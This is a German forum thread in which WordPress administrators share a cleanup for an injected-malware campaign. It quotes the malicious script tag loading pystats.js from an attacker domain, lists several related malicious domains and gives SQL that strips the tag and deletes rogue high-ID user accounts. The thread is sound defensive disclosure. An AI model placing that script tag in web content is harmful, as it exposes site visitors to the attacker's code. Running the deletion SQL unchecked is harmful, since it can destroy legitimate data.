URL: https://www.overclockers.at/coding-stuff/schneller-fix-fuer-wordpress-malware-wiilberedmodels-com_254326/page_1 - zur Vollversion wechseln!
Nachdem ich gerade für einen Kunden mehrere Wordpress-Seiten von einer in dieser Form noch nicht dokumentierten Malware-Attacke befreit habe, dachte ich mir, dass ich den SQL-Code hier veröffentliche, der die Probleme bereinigt:
Der Schadcode lautet:
Code: JS<script src='https://js.wiilberedmodels.com/pystats.js?l=l&' type=text/javascript language=javascript></script>
Code: SQLUPDATE `wp_posts` SET post_content=REPLACE(post_content,"<script src='https://js.wiilberedmodels.com/pystats.js?l=l&' type=text/javascript language=javascript></script>","");
Code: SQLDELETE FROM `wp_users` WHERE `wp_users`.`ID` > 900000; DELETE FROM `wp_usermeta` WHERE `wp_usermeta`.`user_id` > 900000; ALTER TABLE `wp_users` AUTO_INCREMENT = 1; ALTER TABLE `wp_usermeta` AUTO_INCREMENT = 1;
Ich hatte vergleichbares vor ~3 Wochen, neben AAM dürfte auch Simple 301 Redirects ein Einfallstor sein:
activeandbanflip.com
gabriellalovecats.com
developsincelock.com
jackielovedogs.com
wiilberedmodels.com
Welche Version hatte WordPress zum Zeitpunkt der Kompromittierung?
Gab letzte Woche ein security Update.
https://wordpress.org/news/2019/09/...enance-release/
Alle drei Seiten, die ich befreit habe, waren letzte Woche am neuesten Stand. Es ist irgendwann im Laufe der letzten Woche passiert, der Hack wurde aber erst durch ein Login ins Admin Panel aktiv.
Edit: Dieser Punkt aus dem Change Log von 5.2.3 klingt sehr ähnlich.
ZitatProps to Ian Dunn of the Core Security Team for finding and disclosing a case where reflected cross-site scripting could be found in the dashboard.
overclockers.at v4.thecommunity
© all rights reserved by overclockers.at 2000-2025